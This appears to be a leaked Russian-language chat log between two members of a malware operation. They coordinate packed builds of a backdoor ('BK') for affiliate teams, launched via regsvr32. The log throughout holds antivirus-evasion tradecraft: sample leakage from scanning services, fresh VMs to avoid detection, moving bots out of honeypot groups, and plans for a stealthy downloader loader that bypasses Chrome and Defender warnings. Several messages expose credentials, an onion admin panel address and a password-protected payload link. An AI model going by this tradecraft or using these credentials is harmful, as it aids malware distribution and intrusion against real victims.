[12.08.21 12:15:38] manuel:		Значит будем искать.
[12.08.21 12:15:40] collin:		видимо да, есть еще 2 потенциальных партнера которые не начали работать пока
[12.08.21 12:16:02] manuel:		Да это хорошо, развитие!
[12.08.21 12:21:09] manuel:		Написал франсису говрит что решим.
[12.08.21 13:03:47] manuel:		Скажи, а что по бк ехе для мерча с пдф иконками?
[12.08.21 13:05:27] manuel:		Скажи, а что по бк ехе для мерча с пдф иконками?
[12.08.21 13:06:41] collin:		впроцессе
[12.08.21 13:06:48] collin:		минут 30 еще
[12.08.21 13:06:57] collin:		тебе скидывать?
[12.08.21 13:07:02] manuel:		Ему.
[12.08.21 13:35:20] collin:		6 криптов ему выдали, говорит пока хватит
[12.08.21 13:35:38] manuel:		Хорошо. спасибо.
[25.08.21 12:30:23] manuel:		Првиет. Ты уже вышел из отпуска?
[25.08.21 12:33:03] collin:		привет!
[25.08.21 12:33:19] collin:		со след.недели с понедельника выхожу
[25.08.21 12:33:38] manuel:		Понял. Нашли тебе доп тестировщика.
[25.08.21 12:33:57] collin:		отлично!
[25.08.21 12:34:11] collin:		он еще не начал работать?
[25.08.21 12:34:11] manuel:		В понедельник тогда состыкуетесь
[25.08.21 12:34:15] collin:		ок
[25.08.21 12:34:33] manuel:		Это наш админ, он сервера регает и дополнительно будет тестировать
[30.08.21 10:02:02] manuel:		Привет. По новому тестировщику. У него ник nick
[30.08.21 10:02:12] manuel:		Как он придет - напишет тебе.
[30.08.21 10:11:02] collin:		привет! ок
[30.08.21 10:11:15] collin:		Порфирио со след.недели в отпуске
[30.08.21 10:11:28] collin:		можно сейчас уже ника вводить в курс дела?
[30.08.21 10:11:58] manuel:		Да конечно.
[30.08.21 10:12:06] collin:		подскажи еще насчет групп 16 и 29
[30.08.21 10:12:18] collin:		я так понял какая-то рокировка была, Элрой пишет - ты должен был права раскидать
[30.08.21 10:12:44] collin:		просто гр. 29 - нет ни у кого кроме тестера и кодера
[30.08.21 10:12:49] manuel:		ТАм была история что у нетволкера в начале была 16 группа. Потом ее попросил сделать зевс и элрой сделал для зевса 16 группу а нетволкера перенесли на 19 группу
[30.08.21 10:13:24] collin:		а кто ему права на 29 группу ставил, или должен был поставить?
[30.08.21 10:21:58] manuel:		Элрой.
[31.08.21 07:57:46] manuel:		Привет.
[31.08.21 07:57:54] collin:		привет!
[31.08.21 07:58:08] manuel:		Сейчас тебе напишет nick - новый тестировщик
[31.08.21 07:58:29] manuel:		И еще я хочу попросить сборку БК дял нетволкера для тестов на нашей ферме корп ав
[31.08.21 07:58:42] manuel:		крипт dll regsvr32
[31.08.21 07:58:46] collin:		x64?
[31.08.21 07:59:04] manuel:		Да
[31.08.21 07:59:08] collin:		ок
[31.08.21 08:42:26] collin:		крипт гр. 29 выдаст Порфирио
[31.08.21 08:42:34] manuel:		ок
[31.08.21 11:16:10] collin:		привет!
[31.08.21 11:16:13] collin:		еще раз
[31.08.21 11:17:00] collin:		авчек точно сливает образцы при проверках?
[31.08.21 11:17:58] manuel:		есть подозрение
[31.08.21 11:18:08] manuel:		С сильвером как то обсуждали
[31.08.21 11:18:32] collin:		а в динчеке такого не замечалось?
[31.08.21 11:18:42] manuel:		В динчеке нет
[31.08.21 11:19:01] collin:		например были случаи - при повторных проверках на ESET одного и того же файла: 1 раз чисто, 2 - уже детект
[31.08.21 11:19:06] manuel:		если статику делать то нет. рантайм с фул интернетом льет
[31.08.21 11:19:09] collin:		такое не от облака?
[31.08.21 11:20:22] manuel:		я такое и в дефендере  наблюдал
[31.08.21 11:20:45] collin:		с облаком.. возможно и там включено
[31.08.21 11:20:52] manuel:		да облако и сервисы огрегаторы, которые обмениваются инфой
[31.08.21 11:20:53] collin:		но не сильно протекает)
[31.08.21 12:29:12] manuel:		А кто у нас крипты БК делает Зевсу?
[31.08.21 12:29:14] manuel:		<zevs@q3mcco35auwcstmt.onion> давай 100
[31.08.21 12:30:29] manuel:		Скажи ,а кто у нас делает крипты БК для команды Зевса?
[31.08.21 12:30:40] manuel:		<zevs@q3mcco35auwcstmt.onion> давай 100
[31.08.21 12:31:04] collin:		wild сейчас
[31.08.21 12:31:27] manuel:		Напишу ему.
[31.08.21 16:04:05] collin:		скажи у нас есть возможность проверять статику на авчеке?
[31.08.21 16:05:47] manuel:		Вот непонятно. Там 1 тест. Непонятно какой. Скорее всего - статика
[31.08.21 16:06:28] collin:		даже нет разделения статика/динамика?
[31.08.21 16:07:15] manuel:		Нет.
[31.08.21 16:07:22] manuel:		У тебя нет доступа туда?
[31.08.21 16:07:31] collin:		нет
[31.08.21 16:07:43] manuel:		Сейчас пришлю
[31.08.21 16:07:50] collin:		суть в чем для Зевса крипты думаю может через авчек проверять вместо динчека
[31.08.21 16:07:55] manuel:		```
https://avcheck.net
benalen@exploit.im
DH*&HKDbs*&TGLksg87whnw40utji$
```
[31.08.21 16:07:59] collin:		они перепроверяют там и результаты не бьются у нас
[31.08.21 16:08:44] manuel:		Я для Лео проверяю на динчеке. Его сап потом проверяет на авчеке после получения. 90% чисто на авчеке если на динчеке чисто
[31.08.21 16:08:57] manuel:		Надо пробовать
[31.08.21 16:09:19] collin:		не пускает
[31.08.21 16:09:25] collin:		Incorrect username or password.
[31.08.21 16:10:28] manuel:		упс..
[31.08.21 16:10:32] manuel:		Логин просто
[31.08.21 16:10:38] manuel:		benalen
[31.08.21 16:10:57] collin:		+
[31.08.21 16:11:22] collin:		какие лимиты там?
[31.08.21 16:13:18] manuel:		```
200 files / 1000 domains per day
60 files / 300 domains per hour
```
[31.08.21 16:13:34] collin:		проверки не больше 10 секунд, наверное только статика
[31.08.21 16:13:59] manuel:		Да.
[01.09.21 07:47:55] manuel:		Доброе утро. Сегодня мне тоже нужен крипт длл БК. группа нетволокера для тестов. Запуск regsvr32
[01.09.21 16:29:29] collin:		привет!
[01.09.21 16:29:43] collin:		у nick есть учетка в нашей тор-жабе?
[01.09.21 16:29:44] manuel:		Првиет.
[01.09.21 16:29:53] manuel:		ТОчно не знаю.
[01.09.21 16:29:58] manuel:		Сейчас спрошу.
[01.09.21 16:30:06] collin:		если нет - кто может выдать?
[01.09.21 16:30:11] collin:		adam
[01.09.21 16:30:13] manuel:		адам
[01.09.21 16:34:56] manuel:		Да говрит нет акка в жабе
[01.09.21 16:35:03] manuel:		Писал Адаму?
[01.09.21 16:44:37] collin:		написал
[01.09.21 16:44:59] manuel:		Хорошо. Скакжи еще, какаие вм нужны для тестов?
[01.09.21 16:45:03] manuel:		С какой ос?
[01.09.21 16:49:24] collin:		я написал ему требования, он хотел взять на наших серверах
[01.09.21 16:49:30] collin:		т.к. свое железо слабое
[01.09.21 16:49:42] collin:		через тебя заказать или к кому из админов?
[01.09.21 16:49:43] manuel:		ок
[01.09.21 16:49:49] manuel:		rocco
[01.09.21 16:49:52] manuel:		он делает вм
[01.09.21 16:50:07] collin:		его уже нет сейчас
[01.09.21 16:50:11] collin:		завтра с утра порешаем тогда
[01.09.21 16:50:28] manuel:		ага
[03.09.21 08:37:46] manuel:		Доброый день. Сделайте, пожалуйста, мне крипт длл для Нетволкера с запуском regsvr32 для тестов.
[03.09.21 08:42:47] collin:		привет!
[03.09.21 08:42:48] collin:		ок
[03.09.21 08:54:11] collin:		крипт пришлет wild
[03.09.21 08:54:22] manuel:		Хорошо. Спасибо!
[03.09.21 09:33:10] collin:		`[03.09.2021 09:22:06] <mont> бентли когда проверял крипт, сказал что у него отстучал, но в  онлайн не вышел бот `
[03.09.21 09:33:18] collin:		как понять остучал но не онлайн?
[03.09.21 09:33:35] manuel:		Появился в новых и не отрабатывал команды
[03.09.21 09:33:41] manuel:		скорее всего дело было в впн
[03.09.21 09:33:57] manuel:		Bot a7066e2f953118e91b8adbdde4f718b7 is Offline
[03.09.21 09:34:02] manuel:		Вот этот бот ыбл
[03.09.21 09:34:32] collin:		в ханипоты упал?
[03.09.21 09:34:40] manuel:		да
[03.09.21 09:35:11] collin:		в ханипотах боты не принимают команды
[03.09.21 09:35:16] collin:		сервер всегда отвечает "ошибка"
[03.09.21 09:35:23] collin:		нужно переносить в тестовые или боты
[03.09.21 09:35:33] manuel:		Странно у меня нет прав перенести его в другую группу
[03.09.21 09:35:50] collin:		должно быть
[03.09.21 09:35:59] collin:		слева в списке ставишь галочку
[03.09.21 09:36:24] collin:		сверху область With selected и список - в списке выбираешь "Test bot", жмешь Go
[03.09.21 09:39:17] manuel:		Понял. ак буду делать в след раз
[06.09.21 11:39:20] manuel:		Рамон просит исходник Бк группы G5 длл
[06.09.21 11:40:18] collin:		g5 - группа дерека, он писал что сам по ней заказы делает, уточню
[06.09.21 11:40:27] manuel:		Ага.
[06.09.21 11:40:46] manuel:		Он заказывал сегодня?
[06.09.21 11:40:54] collin:		да
[06.09.21 11:41:08] collin:		крипты, про исходник не писал
[06.09.21 11:43:00] manuel:		Можно тогда мне исходник? Я передам ему
[07.09.21 08:02:12] collin:		привет!
[07.09.21 08:02:39] collin:		есть какие-то методические материалы по основам тестирования у нас?
[07.09.21 08:02:47] manuel:		Привет
[07.09.21 08:03:00] collin:		для nick можешь что-то дать по основам
[07.09.21 08:03:20] collin:		я думал ему специфику по тестам БК нужно будет передать, а он в основах плавает
[07.09.21 08:03:34] collin:		все с нуля приходится объяснять
[07.09.21 08:03:59] manuel:		Добро
[09.09.21 10:10:57] manuel:		Добрый день. Сделай, пожалуйста, крипт длл БК для Нетволкера. С запуском. regsvr32
[09.09.21 10:12:13] manuel:		И ехе.
[09.09.21 10:19:58] collin:		привет!
[09.09.21 10:19:59] collin:		ок
[09.09.21 10:20:11] collin:		крипты wild будет делать
[09.09.21 10:20:32] manuel:		Добро. Спасибо.
[09.09.21 15:30:53] manuel:		По БК для дерека и его команды. Попросили проверить с облаком их ехель. Наш крипт бк палится Trojan:Win32/Wacatac.B!ml
[09.09.21 15:30:56] manuel:		Что делать?
[09.09.21 15:31:13] manuel:		На запуске ехелем бк
[09.09.21 15:31:47] manuel:		По БК для дерека и его команды. Попросили проверить с облаком их ехель. Наш крипт бк палится Trojan:Win32/Wacatac.B!ml
Что делать?
На запуске ехелем бк
[09.09.21 15:36:25] collin:		кто проверял ты сам?
[09.09.21 15:36:47] manuel:		Lf
[09.09.21 15:36:47] manuel:		Да
[09.09.21 15:39:00] collin:		какой детект полный отчет можешь скинуть?
[09.09.21 15:39:21] manuel:		уже откатил. Сейчас попрошу еще раз
[09.09.21 15:39:35] collin:		машина, адрес чистые - соответствуют требованиям что я давал?
[09.09.21 15:40:11] manuel:		так. Напомни сайт для проверки айпи
[09.09.21 15:46:45] collin:		https://www.virustotal.com/gui/ip-address/8.8.8.8
[09.09.21 15:47:08] manuel:		ок.
[09.09.21 15:47:19] collin:		а часто они просят тест с облаком
[09.09.21 15:47:27] collin:		последний раз до этого когда было?
[09.09.21 15:47:42] manuel:		давно не просили
[09.09.21 15:48:24] manuel:		Айпишник чистый. Как чекнуть вм что она не стучит?
[09.09.21 15:49:24] collin:		ВМ свежеустановленная нужна, не больше недели
[09.09.21 15:49:42] collin:		и мало проверок малвари было, в идеале вообще нулевая
[09.09.21 15:49:54] collin:		сколько на этой машине проверял с облаком уже примерно?
[09.09.21 15:50:11] manuel:		много месяц где-то
[09.09.21 15:50:19] manuel:		Значит перекатаю вм для этого теста
[10.09.21 07:47:44] manuel:		Привет. Да дело было в вм вчера. На новой вм не было такого детекта с ехелем дерека.
[10.09.21 07:49:17] collin:		привет!
[10.09.21 07:49:20] collin:		ок
[10.09.21 07:50:10] collin:		а сколько раз с новой ВМ тестили, один?
[10.09.21 07:50:32] manuel:		1
[10.09.21 07:50:37] manuel:		Lj jncnerf d flvbyre
[10.09.21 07:50:41] manuel:		До отстука в админку
[10.09.21 07:56:28] manuel:		Еще по БК. Вчера анжело протестировал на нашей ферме сборку длл которую делали для нетволкера. Все чисто кроме сумантика и трендмикро. У тренд микро детект после запуска у сумантеека - после открытия архива.
[10.09.21 08:00:09] collin:		он длл тестил или эксель?
[10.09.21 08:00:17] manuel:		lkk ghjcnj
[10.09.21 08:00:29] manuel:		Просто длл
[10.09.21 12:50:55] manuel:		Нетволкер просит почистить сборку БК, чтобы чисто было на:
Trend Micro - Детект после старта
Symantec - детект после открытия архива
[10.09.21 12:50:57] manuel:		Можно сделать?
[13.09.21 13:56:00] manuel:		Првиет. Сделаейте, пожалуйста, крипт БК для нетволкера в ехе.
[13.09.21 13:56:27] collin:		привет!
[13.09.21 13:56:28] collin:		ок
[15.09.21 13:23:26] manuel:		Добрый день. Нетволкер просит сделать ему крипт БК в ехе и дать доступ к админке.
[15.09.21 13:23:40] collin:		привет!
[15.09.21 13:23:49] collin:		новую учетку?
[15.09.21 13:23:50] collin:		а группу?
[15.09.21 13:23:57] manuel:		Да такую же
[15.09.21 13:23:59] manuel:		Группу.
[15.09.21 13:24:12] collin:		в новую учетку
[15.09.21 13:24:23] collin:		или старую обновить пароль
[15.09.21 13:24:31] manuel:		Сейчас спрошу.
[15.09.21 13:25:15] manuel:		Учетка осталась с b15
[15.09.21 13:25:59] collin:		у него сейчас b29 учетка
[15.09.21 13:26:04] collin:		к ней пароль, или новую отдельную нужно?
[15.09.21 13:26:29] collin:		b15 - было на старой админке, давно уже нет
[15.09.21 13:26:32] manuel:		Да давай к ней пароль. Адресс.
[15.09.21 13:26:37] manuel:		К b29
[15.09.21 13:26:57] collin:		+
[15.09.21 13:28:25] collin:		```
b29
sB7mDN9KEb4mj3kS8NS3k9Bd3Bd
```
[15.09.21 13:28:33] manuel:		++
[15.09.21 13:28:44] collin:		адрес:
[15.09.21 13:28:45] collin:		https://lch5nnzyb5aof43pitcrzkmnvlr4xkrestpj4cpwstvgej34kqq6wqyd.onion/sOIDFhsAIUfhu42332uygt27634ft7yuaFGyaugkJFsayjegf--_-GBASfdvt23fv/
[15.09.21 13:28:55] collin:		группа 29 остается
[15.09.21 13:28:58] collin:		крипт выдаст wild
[15.09.21 13:29:42] manuel:		ок.
[16.09.21 16:27:09] manuel:		Добрый вечер.
[16.09.21 16:27:30] collin:		привет!
[16.09.21 16:27:32] manuel:		Дали на тест ехель для команды дерека. ЗАпустил все чисто. БК не стучит.
[16.09.21 16:27:42] manuel:		Скажи какой у него процесс рабочий?
[16.09.21 16:27:48] manuel:		Можно найти в процессах*
[16.09.21 16:28:03] collin:		там exe или dll?
[16.09.21 16:28:09] collin:		он два вида сегодня брал
[16.09.21 16:28:10] manuel:		длл
[16.09.21 16:28:24] manuel:		326 кб длл
[16.09.21 16:28:58] collin:		176.119.195.107 - не такой айпи должен быть?
[16.09.21 16:29:13] manuel:		да мой
[16.09.21 16:29:27] collin:		он в хани попал
[16.09.21 16:29:49] collin:		в этой сборке отстук долгий, 8-15 минут
[16.09.21 16:30:11] manuel:		Та же ошибка что впрошлый раз... Отправил его в тестовые
[16.09.21 16:30:44] collin:		на некоторых группах фильтрация по странам, не на всех
[16.09.21 16:31:07] manuel:		можно его активировать?
[16.09.21 16:31:50] manuel:		сделал ему запрос
[16.09.21 16:32:03] collin:		видимо надо перезапускать, бот мог уйти в цикл поиска адреса
[16.09.21 16:32:40] collin:		если тестишь с постоянного набора адресов - их можно все внести в правила фильтрации, чтобы садились в тестовые автоматом
[16.09.21 16:33:02] manuel:		Все ок. Отработал
[16.09.21 16:33:03] manuel:		Bot 1104099444653032899817978853214104102743 is ready
[16.09.21 16:33:21] collin:		вижу он стукнул, значит не ушел на 3 шаг еще (генерация и перебор базаров)
[16.09.21 16:33:39] manuel:		понятно. Все ок тогда. Спасибо )
[16.09.21 16:33:55] collin:		+
[16.09.21 16:45:22] manuel:		Тебе stuffy стукнет по криптам для БК
[16.09.21 16:45:33] manuel:		Он делает стаб
[16.09.21 16:47:56] collin:		ок
[21.09.21 13:14:33] manuel:		Првиет. У меня вопрос.
[21.09.21 13:14:38] collin:		привет!
[21.09.21 13:14:44] manuel:		Помнишь в прошлом году делали лоадеры для Таргета.
[21.09.21 13:15:11] manuel:		Другой клиент просит себе тихий незаметный лоадер, чтобы он скачивал файл длл с 3-4 линков и запускал.
[21.09.21 13:15:18] manuel:		Можем такое сделать?
[21.09.21 13:20:44] collin:		у нас лоадер универсальный в разработке сейчас, юзать пока нельзя
[21.09.21 13:21:00] collin:		тот что у меня был под exe только, плюс не поддерживался не чистился боольше года
[21.09.21 13:21:45] manuel:		Понятно. А чт ос универсальным лоадером?
[21.09.21 13:22:00] collin:		в разработке, уточню
[21.09.21 13:25:47] manuel:		А тот лоадер что у рояла был?
[21.09.21 13:25:57] manuel:		Можем его воскресить?
[21.09.21 13:30:10] collin:		у него как и давно не чистился, нужно актуализировать чистить
[21.09.21 13:30:35] collin:		1) когда нужно по срокам 2) по АВ какие требования, где должна динамика чистая быть?
[21.09.21 13:31:13] collin:		ну там лоадер очень простой, не факт что сейчас будет работать
[21.09.21 13:32:10] collin:		без кардинальной доработки
[21.09.21 13:32:54] collin:		и еще 3) он разово нужен или на постоянку?
[21.09.21 13:41:36] collin:		`для криптов в ексе есть кстати криптер, мне вчера мануель дал, чтобы на вашине прямо собирать, я правда не успел протестить, на момент какон мне выдал эту штуку я уже все сделал`
[21.09.21 13:41:38] collin:		что за криптер?
[21.09.21 13:42:23] manuel:		Это криптер от stuffy он делает из длл ехе
[21.09.21 13:42:34] manuel:		в виде ехе файла.
[21.09.21 13:44:47] collin:		generic профиль?
[21.09.21 13:45:06] manuel:		Точно не знаю. Скорее всего.
[21.09.21 13:45:34] collin:		а что он сказал, под какие задачи?
[21.09.21 13:45:47] manuel:		Под крипт БК из длл в ехе
[21.09.21 13:45:47] collin:		почемуто BK в названии фигурирует..
[21.09.21 13:46:01] collin:		понял, уточню у него
[21.09.21 13:46:09] collin:		у нас просто нет особенностей в БК для крипта в exe
[21.09.21 13:46:24] manuel:		Ясно
[21.09.21 14:26:12] manuel:		Еже вопрос. Зевс просит крипты выдать завтра к 8 утра.
[21.09.21 14:26:16] manuel:		Как это можно сделать?
[21.09.21 14:27:58] collin:		у нас есть тестеры которые в это время работают
[21.09.21 14:28:04] collin:		ночную или утреннюю смену?
[21.09.21 14:29:14] manuel:		Я могу с утра начать по раньше завтра
[21.09.21 14:29:27] manuel:		Если на постоянку будем думать кого подрядить
[21.09.21 14:31:34] manuel:		Какая будет группа?
[21.09.21 14:31:55] collin:		35
[21.09.21 14:32:04] collin:		сборку готовит Роял, перешлю тебе
[21.09.21 14:32:15] collin:		сегодня тоже крипты сделаем на всякий случай
[21.09.21 14:33:01] manuel:		На билд машине делаете крипты?
[21.09.21 14:33:28] collin:		да профили dll_bk_crypter*
[21.09.21 14:33:39] collin:		dll_rundll_crypter* тоже подойдут
[21.09.21 14:33:56] manuel:		Пнятно.
[21.09.21 14:34:20] manuel:		С какой точкой входа выдавать? Админка lch5nnzyb5aof43pit... Да,
[21.09.21 14:34:24] collin:		с 7 стабом сейчас проболемы если исходник от компилятора gcc
[21.09.21 14:34:41] collin:		` Админка lch5nnzyb5aof43pit` -да
[21.09.21 14:34:55] collin:		запуск через regsvrv32
[21.09.21 14:35:10] collin:		то есть точка DllRegisterServer
[21.09.21 14:37:31] collin:		на автобилдах проблема может быть: 1) с 7 стабом (не работает с исходником, собранным gcc, с7 можно попробывать другой из набора clang или msvc если есть)
[21.09.21 14:37:39] manuel:		Понятно.
[21.09.21 14:37:49] collin:		2) 2 стаб - скорее всего грязный на автобилдах, т.к. Базил делает вручную сейчас
[21.09.21 14:37:55] collin:		3) 4 стаб опять походу сломался
[21.09.21 14:37:56] manuel:		А точку там надо указывать при билде или оставлять поле пустым?
[21.09.21 14:38:03] collin:		оставлять пустым
[21.09.21 14:38:16] manuel:		понятно
[21.09.21 14:38:44] collin:		выдаем крипты mont@, если его нет то zevs@ в тор-жабе
[21.09.21 14:38:52] manuel:		хорошо.
[21.09.21 14:43:14] collin:		3 крипта им нужно будет
[21.09.21 14:43:37] manuel:		Хорошо.
[21.09.21 14:53:40] manuel:		Ответили на вопросы по лоаедру.
[21.09.21 14:54:06] manuel:		1. В ближайщее время.
2. Основные ав чистый рантайм.
3. Надо на постоянку.
[21.09.21 14:55:43] collin:		ну тогда мой с роялом лоадер точно не подойдет, раз на постоянку
[21.09.21 14:55:52] collin:		надо ждать когда ryan свой проект сделает
[21.09.21 14:56:26] collin:		у нас все время на текущие проекты уходит, чистки регулярные не потянем..
[21.09.21 14:58:11] manuel:		Понятно. А как со временем? Еть понимание когда ryan сделает?
[21.09.21 15:02:06] collin:		уточню, напишу
[21.09.21 15:02:17] manuel:		Хорошо.
[21.09.21 15:21:29] collin:		```
35
dl2 regsvr32/rundll32:
Download: https://qaz.im/load/9ni2iG/RftdSh
Пароль: l%<s{NM[+J=cW7eff%W}
```
[21.09.21 15:22:17] collin:		боевой модуль в папке clang\x64\Release_nologs_dll,
[21.09.21 15:22:26] collin:		впапке release_dll - логированный
[21.09.21 15:22:31] collin:		раз кланг - значит 7 стаб пойдет
[21.09.21 15:22:34] manuel:		Хорошо.
[21.09.21 15:31:28] collin:		`он скачивал файл длл с 3-4 линков и запускал` - какой нужен запуск dll - файловый или бесфайловый (инжект)?
[21.09.21 15:32:11] manuel:		А что меньше палится?
[21.09.21 15:32:51] collin:		сложно однозначно сказать
[21.09.21 15:33:11] collin:		в бк бесфайлового запуска длл пока нет, поэтому статы нет
[21.09.21 15:33:26] collin:		в обоих вариантах есть как плюсы так и минусы
[21.09.21 15:33:41] collin:		некоторые нагрузки могут быть несовместимы с бесфайлвыми техниками запуска
[21.09.21 15:33:46] manuel:		А что быстрее реализовать?
[21.09.21 15:38:37] collin:		вопрос не в скорости, а что заказчику надо
[21.09.21 15:39:06] collin:		напишу Силверу - добавит тебя в канал про этот лоадер, там обсудим
[21.09.21 15:39:19] manuel:		Хорошо.
[22.09.21 07:08:11] collin:		привет!
[22.09.21 07:08:46] collin:		не в курсе работали с утра по 35 группе?
[22.09.21 07:08:52] collin:		ботов нет в админке
[22.09.21 09:31:08] manuel:		Првиет. Выдал рано утром к 8 3 крипта 35 группы
[22.09.21 09:31:33] manuel:		Првиет. Выдал рано утром к 8 3 крипта 35 группы
[22.09.21 09:31:53] manuel:		Сейчас спрошу у робина
[22.09.21 09:32:09] manuel:		Кстати, он говрил, что еще вчерашние крипты были чистые.
[22.09.21 09:32:27] collin:		ага, там делал атлас, у него хорошие обычно
[22.09.21 09:32:46] collin:		уточнил у тестеров - nick может с утра выходить при необходимости, wild тоже с 7 мск
[22.09.21 09:33:16] manuel:		Да говрил с wild. Если что его можно зарядить под это.
[22.09.21 09:33:25] manuel:		Он более ответственный.
[22.09.21 09:34:36] manuel:		Еще поговрил с сильвером про лоаедр для рамона. Он говрит что у нового лоадера еще все далеко до завершения и предлагает поднять старые наработки.
[22.09.21 09:34:47] manuel:		Рамон просит лоадер для прогрузки кобы длл
[22.09.21 10:59:20] collin:		а был еще у кого-то простой лоадер, кроме меня и Рояла - не в курсе?
[22.09.21 10:59:35] manuel:		Нет на сколько я знаю.
[22.09.21 11:00:00] manuel:		Зевс не запустился с утра по европе. У него тех проблемы.
[22.09.21 11:00:14] manuel:		Говорит, что отпишет вечером по планам на завтра утро.
[22.09.21 12:58:55] manuel:		Рамон созрел на БК с мак ос. Просит выдать.
[22.09.21 13:00:21] collin:		так не до конца еще готово
[22.09.21 13:00:22] collin:		уточню
[22.09.21 13:03:48] collin:		проект в разработке, делать и тестить еще нужно
[22.09.21 13:11:48] collin:		еще спроси про требования для простого лоадера плз
[22.09.21 13:12:09] collin:		1) в каком формате нужен сам лоадер - dll/exe (если dll - способ запуска и точка входа какая)
[22.09.21 13:12:24] collin:		2) какая архитектура лоадера и нагрузки
[22.09.21 13:12:41] collin:		3) какие АВ в первую очередь нужно обходить?
[22.09.21 13:23:44] manuel:		А по мак ос есть по срокам понимание?
[22.09.21 13:25:39] collin:		пока нет
[22.09.21 13:26:06] collin:		занимается один кермит, у него еще другие задачи
[22.09.21 13:26:13] collin:		попробуем распланировать посчитать, напишу
[22.09.21 13:26:38] collin:		насчет простого лоадера - поручу новичкам нашим
[22.09.21 13:27:05] collin:		через 2 недели первые сборки должны будут пойти
[22.09.21 13:31:31] manuel:		1.ехе fail
2.3.желательно чтобы вообще криптовать не надо было для точечного прогруха
я сейчас куда гружу
они даже не криптуют его
[22.09.21 13:32:56] manuel:		divine> смотри суть такая
я гоню трафф на ленд
там уже пользователи качают
нужно обходить гугл хром алерт и дефендер этот самый минимум
гугл хром мы можем обойти ...
а вот все остальное нет
[22.09.21 13:36:09] collin:		`желательно чтобы вообще криптовать не надо было` - как понять, нужен только исходник без крипта?
[22.09.21 13:36:18] collin:		или наоборот готовый крипт даем чтобы сразу в работе
[22.09.21 13:36:40] collin:		или наоборот готовый крипт даем чтобы сразу в работу пускать
[22.09.21 13:58:23] manuel:		rhbgnКрипт чтобы выдавали
[23.09.21 08:31:47] manuel:		Првиет.
[23.09.21 08:32:45] manuel:		Вчера вечером уже позждно Зевс сказал что надо будет с утра сегодня грузить. Проверил вчерашнюю сборку. ВСе работало. Выдал с утра сегодня крипты. Говрят что грузят.
[23.09.21 08:33:04] collin:		привет!
[23.09.21 08:33:08] collin:		ок
[23.09.21 08:33:39] collin:		напишу ему чтобы пораньше предупреждали в след. раз - надо же подготовить, не факт что свежая/рабочая сборка будет внезапно
[23.09.21 08:34:40] manuel:		Да. Я тоже переживал чтобы адреса были живые.
[23.09.21 15:11:13] collin:		привет!
[23.09.21 15:11:20] collin:		еще вопрос по простому лоадеру, по требованиям
[23.09.21 15:11:31] collin:		минимальная поддерживая версия ОС какая нужна?
[23.09.21 15:11:43] collin:		XP / 7
[23.09.21 15:11:46] manuel:		7 - 10
[23.09.21 15:11:52] collin:		ок
[23.09.21 16:47:31] manuel:		Монт говрит готовить сборку длл на утро
[23.09.21 16:48:22] collin:		так на сегодня новой нет, и сейчас уже никто не сделает
[23.09.21 16:48:30] collin:		а в старой адреса грязные наверное
[23.09.21 16:48:38] manuel:		<bentley> Бро, подскажи, завтра с утра так же выдаем крипты длл БК для европы? 
[19:46:37] <mont@q3mcco35auwcstmt.onion> да 
[19:46:41] <mont@q3mcco35auwcstmt.onion> все верное 
[19:46:53] <mont@q3mcco35auwcstmt.onion> хорошо что напомнил 
[19:47:02] <mont@q3mcco35auwcstmt.onion> сейчас оплатим расходники и работаем завтра 
[19:47:12] <bentley> Ок. ТОгда готовим сборочку 
[19:47:25] <mont@q3mcco35auwcstmt.onion> спасибо
[23.09.21 16:49:03] collin:		я писал зевсу до 16 мск говорить
[23.09.21 16:49:13] collin:		нет так нет, сейчас проверю старую
[23.09.21 16:49:19] collin:		если адреса не легли - ее подготовим
[23.09.21 16:49:24] manuel:		Ок.
[23.09.21 16:49:28] manuel:		А кто выдаст?
[23.09.21 16:49:37] collin:		вилд уже готов завтра подойти
[23.09.21 16:49:40] collin:		сейчас уточню
[23.09.21 16:49:43] manuel:		Хорошо.
[23.09.21 16:50:18] collin:		а сборка осталась у тебя?
[23.09.21 16:50:26] manuel:		Да.
[23.09.21 16:50:33] manuel:		Залить в криптопанель?
[23.09.21 16:50:34] collin:		а нашел у меня тоже есть
[23.09.21 16:50:38] manuel:		ок
[23.09.21 17:03:08] collin:		продублируй мне и wild сборку 35
[23.09.21 17:03:24] collin:		у меня ссылки были только уже сдохли
[23.09.21 17:04:49] manuel:		dl2_x64_35_416.dll залил во вкладку ВК
[23.09.21 17:06:26] collin:		+
[27.09.21 08:10:09] manuel:		Доброе утро.
[27.09.21 08:10:18] manuel:		У франсиса вопрос:  <mango> бро здарова! а кто щас у нас пользуется бк? запрашивает кто то из хакеров билды?
[27.09.21 08:10:40] collin:		привет!
[27.09.21 08:12:18] collin:		за прошлую неделю брали: love, dylon, derek, zevs, rozetka + его сапп jackiedugn@exploit.im
[27.09.21 08:12:34] manuel:		Спасибо.
[27.09.21 14:48:08] manuel:		Еще вопрос. Про лоадер для рамона. Есть нвости?
[27.09.21 14:49:15] collin:		выдал задачу двоим кодерам
[27.09.21 14:49:25] collin:		оба оценили сроки примерно в неделю
[27.09.21 14:49:28] collin:		ждем результатов
[27.09.21 14:50:12] manuel:		Понял. Спасибо.
[27.09.21 14:52:44] manuel:		```
<divine> eхе или мси ... котоырй будет обходить гугл арет и гугл деф 
[17:51:35] <divine> tak smogyt sdelat'? 
```
[27.09.21 14:56:14] collin:		сейчас exe только в ТЗ
[27.09.21 14:56:40] collin:		обход АВ гугла - это не лоадера задача, крипта
[27.09.21 14:57:41] manuel:		Понятно.
[29.09.21 14:12:53] manuel:		Привет.
[29.09.21 14:12:59] collin:		привет!
[29.09.21 14:13:16] manuel:		Скажи, есть возможность ускорить разработку лоадера для рамона?
[29.09.21 14:13:24] manuel:		Он там хочет кодера деньками подогреть
[29.09.21 14:16:01] collin:		а когда ему нужен лоадер?
[29.09.21 14:16:14] manuel:		Говорит как можно быстрее
[29.09.21 14:16:18] collin:		они и так к концу недели обещали
[29.09.21 14:18:02] manuel:		Хорошо передам что к пятнице сделают
[30.09.21 13:44:35] collin:		привет!
[30.09.21 13:44:59] collin:		можешь дать образец ШК проблемного
[30.09.21 13:45:05] collin:		про которые ты в crypters писал
[30.09.21 13:45:13] collin:		или может на панеле есть такой
[30.09.21 13:53:50] manuel:		да щас
[30.09.21 13:55:09] manuel:		залил в папку col шк для ехе и длл
[30.09.21 16:02:24] collin:		а кто эти файлы делает, не из наших?
[30.09.21 16:02:39] collin:		с ним можно переговорить?
[30.09.21 16:02:53] collin:		а кто эти файлы делает, не из наших?
с ним можно переговорить?
[30.09.21 16:03:01] manuel:		rocco
[30.09.21 16:03:06] manuel:		Тут в жабе
[30.09.21 16:03:48] collin:		а почему они шеллкод называются
[30.09.21 16:04:03] collin:		это обычные dll, PE структура же?
